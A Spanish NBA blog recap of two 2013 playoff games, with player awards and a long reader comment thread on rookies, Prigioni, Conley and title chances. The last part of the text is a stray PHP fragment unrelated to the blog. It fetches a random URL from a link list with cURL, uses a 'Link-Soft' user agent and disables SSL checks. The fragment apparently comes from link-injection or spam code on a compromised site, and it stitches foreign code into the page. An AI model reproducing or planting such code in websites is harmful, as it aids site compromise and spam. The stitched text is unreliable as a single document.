La Crónica: Dos empates y un abismo de por medio

08 de May de 2013 por MagicJohnson32

1-1. Los dos equipos que salían más presionados anoche -Knicks tras verse claramente superados en casa y los Grizzlies después de entregar el primer encuentro- ganaron sus respectivos partidos y empataron las series. Y hasta aquí las coincidencias entre uno y otro partido.

knicks benchEl Pacers-Knicks estuvo marcado por el descomunal parcial que encajó Indiana a partir del 8:30 del tercer cuarto. Hasta ese momento, los locales habían sido mejores desde el mismo salto inicial pero los Pacers habían soportado bien las embestidas de NYK, que lograron ventajas de hasta 13 puntos en la primera mitad pero no habían alcanzado a romper el encuentro de manera definitiva. Hasta esos últimos minutos del tercer período. Entonces, cuando el marcador señalaba un 64-62 favorable a los visitantes, el caudal ofensivo de los Pacers se secó y los Knicks se desataron como un huracán, perfectamente dirigidos por un Prigioni coreado por la grada (“¡Pablo! ¡Pablo!”) y con Melo, esta vez sí, muy acertado.  El parcial creció. Y creció. Y siguió creciendo. En 12 minutos, los neoyorquinos endosaron un 36-4 a su rival, que también hay que decirlo, no pareció especialmente empeñado en evitar la derrota y en cuanto las cosas se torcieron abandonaron el plan de juego que les hace verdaderamente peligrosos (79-105). Lo más positivo para los Knicks, más allá de ganar por primera vez en 13 años un partido de segunda ronda y de equilibrar la eliminatoria antes de viajar a Indiana, es la obvia mejoría en el juego, infinitamente más coral que en el partido inaugural y particularmente por parte de Carmelo Anthony, excelente anoche con 32 puntos, 9 rebotes, 3 asistencias y 2 robos. El sábado a las 2h00, tercer asalto.

grizz okcComo decimos, nada tuvo que ver lo sucedido en el Madison con lo que a continuación vimos en el Chesepeake Arena de Oklahoma City. Aquí nadie lanzó la toalla antes de tiempo. Sin tregua, Thunder y Grizzlies combatieron durante 48 minutos que consagraron a Mike Conley y pusieron en evidencia lo que ya sospechábamos, que Kevin Martin no iba a mantener el nivel del primer encuetro. Con Derek Fisher como casi único aliado, Kevin Durant mantuvo a su equipo a flote durante prácticamente todo el partido, con rentas insignificantes para uno u otro equipo. Enfrente, Conley, Gasol y Randolph se distribuían el peso ofensivo, y Tony Allen y Prince hacían cuanto podían ante KD. Llegados con 86-88 para los Thunder a los últimos tres minutos, que en el primer partido de la serie resultaron calamitosos para Memphis, Gasol y Conley decidieron simplificar las cosas al máximo. A partir de la asociación entre ambos, los Grizzlies encontraron la fluidez en ataque que les costó el partido del domingo y sentenciaron con un 13-5 en el que también fue determinante la pegajosa defensa de Tony Allen sobre Durant y las ayudas inmediatas de Gasol, Randolph o Prince. El espectacular encuentro de Conley, que acabó con 26 puntos, 10 rebotes y 9 asistencias, le redime de sus pecados recientes, aunque los Grizzlies no pueden evitar la idea de que merecían ir a Memphis con un 2-0. Se tendrán que conformar con el 1-1, igual que Durant, de nuevo enorme (36 puntos, 11 rebotes, 9 asistencias) pero esta vez incapaz de anotar los tiros decisivos (99-93). El sábado a las 23h00 se disputará en el FedEx Forum el tercer encuentro de la serie.

PREMIOS

MVP: Tras un primer partido algo flojo, Mike Conley estuvo a punto de convertirse en el primer jugador de los Grizzlies en conseguir un triple-doble en un partido de playoffs. Se quedó con 26 puntos, 10 rebotes y 9 asistencias. En el último cuarto consiguió 13 puntos, 7 rebotes y 2 asistencias, algo que nadie había hecho en Playoffs desde 1999. Por su parte, Carmelo Anthony estuvo más acertado que en partidos anteriores y se fue a los 32 puntos.

kd fishRookie: Pablo Prigioni salió ovacionado del Madison Square Garden. Anotó 10 puntos sin fallos, cogió 4 rebotes y repartió 4 asistencias. El pabellón se vino abajo cuando anotó las 2 primeras canastas de su equipo en el último cuarto y puso a los Knicks 11 arriba.

Sorpresa: A sus 38 años, Derek Fisher fue el mejor escudero de Durant. Anotó 19 puntos con un 4 de 5 en triples. ¿Y lo seguimos considerando sorpresa?

Decepción: Kevin Martin es como una montaña rusa. Si en el primer partido fue clave al anotar 25 puntos, ayer se quedó en 6 con un 2 de 11 en tiro. Incluso más penosa fue la actuación de los Pacers durante los últimos 15 minutos de encuentro, tiempo en el que encajaron un 15-43.

Esfuerzo en vano: También se quedó a una asistencias del triple-doble Kevin Durant. Sus 36 puntos, 11 rebotes y 9 asistencias no fueron suficientes para imponerse a unos Grizzlies que supieron controlarle en los últimos minutos.

TOP 5

Imágenes | AP Photos / Getty Images

Comenta

27 comentarios a esta entrada

  1. dunc dice:
    #1

    Si me cuentan el crecimiento de Mike Conley de hace un par de años ahora no me lo creo.

    Menuda progresión, digna de aplauso.

      Citar

  2. Lucho dice:
    #2

    Es una locura pensar en Prigioni para el quinteto de rookies?
    Yo creo que igualmente no llega (Lillard, Beal, Gilchirst/Waiters, Barnes, Davis/Drummond)
    pero no esta taaan lejos

      Citar

  3. Denise dice:
    #3

    Lucho: Es una locura pensar en Prigioni para el quinteto de rookies?Yo creo que igualmente no llega (Lillard, Beal, Gilchirst/Waiters, Barnes, Davis/Drummond)pero no esta taaan lejos

    Sinceramente ni de lejos..no lo metería ni en un segundo quinteto de rookies. Al margen de los 7 que has nombrado, están Harkless, Nicholson, Crowder, Green (el de los Warriors) y alguno más por ahí que se me quedará en el tintero..

      Citar

  4. MagicJohnson32 dice:
    #4

    Valanciunas, Singler o Shved, así de primeras.

      Citar

  5. Lucho dice:
    #5

    Draymond Green fue un robo del draft. Gran jugador. Esta claro que va a ser un jugador mucho más importante que Pablo en la NBA. Pero su temporada fue mucho mejor? La 12-13. Para mi están muy parejas.
    Y otra cosa, si vamos a los numeros Prigioni debe estar numero 50 ponele, pero no olvidemos que es titular en equipo de 2da ronda, por delante del monstruo de Jason Kidd (que es la mitad del de hace 3 años lo se). Su papel fue importante, mas alla de los números

      Citar

  6. Lucho dice:
    #6

    Green fue un ejemplo nomas. ..

      Citar

  7. melo15 dice:
    #7

    No llega ni de coña a los quintetos, mas que nada porque no ha tenido pratidazos.
    Davis empezo como un tiro, Lillard ha estado increible todo el año, Beal tuvo un par de meses espectaculares y Drummond tambien ha hecho autenticos partidazos.
    Para mi el quinteto ha de ser este:
    Lillard-Beal-Barnes-Davis-Drummons
    Y el segundo:
    Waiters-Shved-Gilchrist-Harkless-Valanciunnas.

      Citar

  8. melo15 dice:
    #8

    Muy bien los Knicks, y tambien Melo. Esta vez si, ha estado mucho mas acertado y los Knicks han empatado la serie, que era crucial.
    Creo que la clave de la eliminatoria puede estar en David West, si este esta acertado los Knicks se van a ver en problemas porque Carmelo no puede pararlo y ademas se carga de faltas. Pero si no esta acertado los Pacers tienen lagunas en ataque muy serias y que los Knicks han de aprovechar si o si.

      Citar

  9. MagicJohnson32 dice:
    #9

    Es verdad, Melo anoche estuvo muy bien. Tuvo la paciencia y el acierto. Un dato brutal sobre su primer partido: en todos los 35:45 minutos que estuvo en pista, Melo dio 8 pases. ¡¡¡8 pases en más de 35 minutos!!! De sus 8 pases, 1 fue un asistencia. El resto de balones que recibió acabaron en tiro (28), falta o pérdida (2).

    Anoche, por ejemplo, dio 9 pases… en el primer cuarto.

      Citar

  10. Esteban dice:
    #10

    Denise: durante los últimos 15 minutos de encuentro, tiempo en el que encajaron un 15-43.

    muy lindo nombrar a todos los rookies habido y por haber, pero solo dos de ellos estan jugando de titular en segunda ronda de PO, y prigioni es uno de llos
    una pena que sus estadisticas no demsuestren lo que da en cancha y que no sea tan expectacular como otros, pero sin dudas, si el lo desea, si ha ganado otro año mas de contrato a la tierna edad de 34 años
    poca cosa no?

      Citar

  11. Esteban dice:
    #11

    melo15:
    Muy bien los Knicks, y tambien Melo. Esta vez si, ha estado mucho mas acertado y los Knicks han empatado la serie, que era crucial.
    Creo que la clave de la eliminatoria puede estar en David West, si este esta acertado los Knicks se van a ver en problemas porque Carmelo no puede pararlo y ademas se carga de faltas. Pero si no esta acertado los Pacers tienen lagunas en ataque muy serias y que los Knicks han de aprovechar si o si.

    no hagamos tanto escandalo por la victoria de los Knicks, por el cntrario, era lo que debia suceder
    podian irse los Pacers 2 arriba con dos juegos de visitante en el madison? imposible

    los pacers hicieron su negoco en el primer juego, aora viene lo de ellos, si logran los dos juegos en casa, las estadisticas los dan practicamente clasiificados, a eso tienen que apostar

      Citar

  12. melo15 dice:
    #12

    Bueno Esteban, en eso llevas razon, pero si los Knicks juegan como ayer, es decir, plantando una buena defensa y circulando el balon. En ese caso los Pacer no se si tienen mucho que hacer porque en ataque son terribles.
    Y si ademas JR esta acertado y Stat vuelve (haber en que estado) pues para mi la plantilla de los Knicks es superior, porque ni Augustin ni Stephenson se van a marcar los partidazos que sae marcaron en el 1.

      Citar

  13. Denise dice:
    #13

    Esteban: muy lindo nombrar a todos los rookies habido y por haber, pero solo dos de ellos estan jugando de titular en segunda ronda de PO, y prigioni es uno de ellos

    Pero en eso no influye tanto el jugadir rookie en cuestión, ¿que culpa tiene el rookie de turno de caer en un equipo bueno o malo? Dicho de otra forma, si Prigioni huebiese fichado por los Wolves, no los habría sacado de pobres, y en cambio Shved podría estar en los Knicks jugando playoffs en 2º ronda y dando mejor rendimiento que Prigioni.
    Tu teoría es como si me dices que Jordan Farmar con sus 2 anillos en Lakers es mejor jugador que Calderón que no se ha comido un rosco en playoffs.

      Citar

  14. rumbero dice:
    #14

    Kendrik Perkins en PO: 18 puntos, 19 pérdidas. Pero no pasa nada porque es la leche defendiendo y secando a Marc cada noche

      Citar

  15. Laker1624 dice:
    #15

    Entre estas dos eliminatorias (Knicks-Pacers y Thunder-Grizzlies) no veo a ningún equipo claramente favorito respecto a su oponente.
    Ahora mismo creo que el que mejor lo tiene para llegar a final de conferencia son los Grizzlies.
    En una hipotética final contra los Heat (que supongo que será finalista), creo que tanto Grizzlies como Spurs serian un rival mas incomodo para Miami que los Thunder.

      Citar

  16. Cocinitas dice:
    #16

    Sinceramente pienso que el único equipo que puede plantar cara en una final a los Heat son los Grizzlies y su juego interior, habrá que ver si estos son capaces de tumbar a los Bulls claro.

      Citar

  17. Denise dice:
    #17

    Cocinitas: Sinceramente pienso que el único equipo que puede plantar cara en una final a los Heat son los Grizzlies y su juego interior, habrá que ver si estos son capaces de tumbar a los Bulls claro.

    Agree + 100.
    -Aunque sigo echando de menos un anotador como Rudy Gay en los momentos calientes y apretados.
    – Añadiría a los Spurs, siempre y cuando éstos sean perros viejos, jueguen a ese estilo POpovych superlento, amarrategui y sin conceder contraataques y empiecen a dar ostias en cada jugada haciendo que el listón de los arbitros sea alto.

    Aun así, Miami es mi favorito nº1 al anillo .

      Citar

  18. Laker1624 dice:
    #18

    Yo creo que Miami no tendrá grandes problemas para eliminar a los Bulls. Veo un 4-2 para los Heat.
    Pero viendo las circunstancias en las que se encuentran los de Chicago pienso que hasta el momento pueden considerarse mas que satisfechos con el trabajo realizado.
    Para mi el equipo que mas opciones tendría de derrotar a los Heat en una final serian los Spurs. Pero físicamente no creo que puedan llegar en el mejor estado a unas finales. Esta eliminatoria contra los Warriors creo que les va a suponer un desgaste importante aunque la pasen por 4-0, y contra Grizzlies o Thunder también creo que sufrirían bastante.
    Aun así, veo a San Antonio en la final por calidad y experiencia.

      Citar

  19. Esteban dice:
    #19

    Denise: Pero en eso no influye tanto el jugadir rookie en cuestión, ¿que culpa tiene el rookie de turno de caer en un equipo bueno o malo? Dicho de otra forma, si Prigioni huebiese fichado por los Wolves, no los habría sacado de pobres, y en cambio Shved podría estar en los Knicks jugando playoffs en 2º ronda y dando mejor rendimiento que Prigioni.
    Tu teoría es como si me dices que Jordan Farmar con sus 2 anillos en Lakers es mejor jugador que Calderón que no se ha comido un rosco en playoffs.

    diosuclpame pero shev no saco de pobre a nadie, incluso con muchismos minutos termino teniendo una mala temporada, quiza el que mas bajo su rendimiento

      Citar

  20. Denise dice:
    #20

    Esteban: diosuclpame pero shev no saco de pobre a nadie, incluso con muchismos minutos termino teniendo una mala temporada, quiza el que mas bajo su rendimiento

    Por supuesto que no, veo que no has entendido lo que quería decir. Es igual. Pero no nos flipemos ahora con Pablo..

      Citar

  21. Ruxixón dice:
    #21

    Memphis está ante una oportunidad única de llegar a la final de conferencia.No creo que deban pensar en que deberían ir 2-0 porque dudo mucho que algún partido se rompa antes del último minuto y la tónica de los partidos en Memphis y los que haya en Oklahoma,mínimo 1 más,será como los anteriores.

    Perkins sigue siendo el sospechoso habitual.Oklahoma tendría el anillo en la mano con un pívot algo mejor,no pido un fuera de serie,pero Perkins resta más que suma,por mucha química que pueda aportar al grupo.

      Citar

  22. HisRoyalAirness dice:
    #22

    Antes de nada 2 cositas:

    1- Para el tercer partido vuelve Stoudamire que, pese a ser la cosa más lamentable defensivamente desde Jason Williams, bien sirve para ponerse delante de West durante 15 minutitos y hacerle alguna falta. Creo que ahí puede estar la eliminatoria porque Melo puede dedicarse a anotar. Al tiempo.

    2-Se dice, se comenta, se rumorea (Chris Sheridan, sin ir más lejos) que DERRICK ROSE puede vestirse para el próximo partido. Es posible que no juegue, más que probable, pero puede suponer una inyección de motivación para sus compañeros simplemente estando ahí (y otra de acojone para los rivales).

    Y con respecto a la superioridad en las eliminatorias yo veo a los Grizzlies muy por encima de los Thunder como equipo. Pero mucho. El factor Durant se apagará un poco lejos del Chesapeake porque los tiros libros no serán tan fáciles de conseguir.
    Y no creo que los oseznos sean los únicos capaces de disputar el anillo a Miami, los Spurs se mueven como pez en el agua por esos lares y no me gustaría a mí tener en frente a Pop, Parker y Duncan, tenga este 37 o 27 años. Quién lo defiende? Bosh? Hombre, por favor. Está claro que Lebron es una bestia parda pero las tácticas de Popovich ya han conseguido ralentizar a tipos como Shaquille O´Neal y llevar el juego a su terreno pantanoso. Pescar un rebote y echar a correr no es tan fácil teniendo a 2 tipos que saben rebotear debajo del aro, en el Este sí, claro, porque es un solar

      Citar

  23. Vader dice:
    #23

    Yo en lo que pienso viendo jugar tan bien a los Knicks con Priogioni, que es un playmaker en toda regla, es lo fantástico que sería juntar a Melo con un CP3, Deron Williams o similar… Lástima que de momento es imposible.

    Saludos!!

      Citar

  24. Sempren dice:
    #24

    HisRoyalAirness:
    Antes de nada 2 cositas:

    1- Para el tercer partido vuelve Stoudamire que, pese a ser la cosa más lamentable defensivamente desde Jason Williams, bien sirve para ponerse delante de West durante 15 minutitos y hacerle alguna falta. Creo que ahí puede estar la eliminatoria porque Melo puede dedicarse a anotar. Al tiempo.

    2-Se dice, se comenta, se rumorea (Chris Sheridan, sin ir más lejos) que DERRICK ROSE puede vestirse para el próximo partido. Es posible que no juegue, más que probable, pero puede suponer una inyección de motivación para sus compañeros simplemente estando ahí (y otra de acojone para los rivales).

    Y con respecto a la superioridad en las eliminatorias yo veo a los Grizzlies muy por encima de los Thunder como equipo. Pero mucho. El factor Durant se apagará un poco lejos del Chesapeake porque los tiros libros no serán tan fáciles de conseguir.
    Y no creo que los oseznos sean los únicos capaces de disputar el anillo a Miami, los Spurs se mueven como pez en el agua por esos lares y no me gustaría a mí tener en frente a Pop, Parker y Duncan, tenga este 37 o 27 años. Quién lo defiende? Bosh? Hombre, por favor. Está claro que Lebron es una bestia parda pero las tácticas de Popovich ya han conseguido ralentizar a tipos como Shaquille O´Neal y llevar el juego a su terreno pantanoso. Pescar un rebote y echar a correr no es tan fácil teniendo a 2 tipos que saben rebotear debajo del aro, en el Este sí, claro, porque es un solar

    Dos matizaciones, porque en el resto estoy muy de acuerdo contigo:
    – LeBron ya tuvo como rivales otros ala-pívots de los que dijimos que se lo comerían al estar en franca ventaja de cuerpo y fundamentos de PF. Y sin embargo, salió airoso muchas más veces de las que cabría esperar. Aunque evidentemente, contra Duncan en unas finales… me encantaría ver ese duelo.
    – Parar con faltas a David West tampoco es una forma de sacar cosas positivas, porque los mete. Además, volviendo en Indiana ya veremos el criterio de los árbitros, aunque les favorecerá que los Pacers no son unos angelitos. Yo creo que es una nota positiva porque es un refuerzo extra, pero salvo que vuelva en muy buenas condiciones (y lo dudo, siendo playoffs seguro que está forzando) no creo que sea determinante en esta eliminatoria.

      Citar

  25. Esteban dice:
    #25

    Vader: lo que pienso viendo jugar tan bien a los Knicks con Priogioni, que es un playmaker en toda regla, es lo fantástico que sería juntar a Melo con un CP3, Deron Williams o similar… Lástima que de momento es imposible.

    imposible? no lo vewol tan imposible despues de ver el rendimiendo de deron williams en los nets, si sigfue asi en picada, su contrato en dos años sera un lastre, un lastre de esos que les encanta tener a los knicks

      Citar

  26. Esteban dice:
    #26

    hablando de eso, miren si los knicks vendieran el contrato de amare por espacio salarial, q lujo de equipo, con 20 millones por gastar podrian pelear enserio enserio por el titulo

      Citar

  27. GreenPride dice:
    #27

    Buena victoria de los Knicks ante unos Pacers que se vinieron abajo de forma estrepitosa. Debían haber peleado más el encuentro de lo que lo hicieron. Antes del colapso se mostraron también inferiores olvidándose en muchas ocasiones de meter balones a los interiores que es donde tienen las verdaderas posibilidades de marcar las diferencias. West debe atacar una y otra vez a Melo para cansarle y sacarle faltas que le saquen de los partidos. Igual que Hibbert con Chandler aunque ya sabemos la poca querencia de este por pegarse en la zona.
    Los Pacers son un equipo digamos académico y en PO hace falta corazón y determinación y aunque les veo superiores como equipo a los Knicks creo que estos son más agresivos y que cuando llegue la hora de la verdad en estas series van a poner lo necesario para llevársela… con mucho sufrimiento eso sí. Esencial para Knicks mover la bola y acertar en los triples.
    En la otra eliminatoria Memphis hizo lo que no pudo hacer en el primer partido. Esta vez Conley sí fue factor en el partido haciendo valer su dominio sobre los bases rivales en los momentos decisivos. Eso más de nuevo la gran ventaja interior de los Grizzlies les hicieron llevarse el partido (¿Para qué sirve Perkins?). Durant está muy sólo en ataque si Martin tiene su día malo y eso que Fisher se destapó con un partidazo en el tiro. Yo creo que deberían dar más bola en ataque a Ibaka al que tras un inicio de año con más protagonismo han vuelto a dejar un poco de lado. Aquí si no hay varios milagros de Durant creo que se acabarán imponiendo los Grizzlies aunque seguro que Durantula les hará trabajárselo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>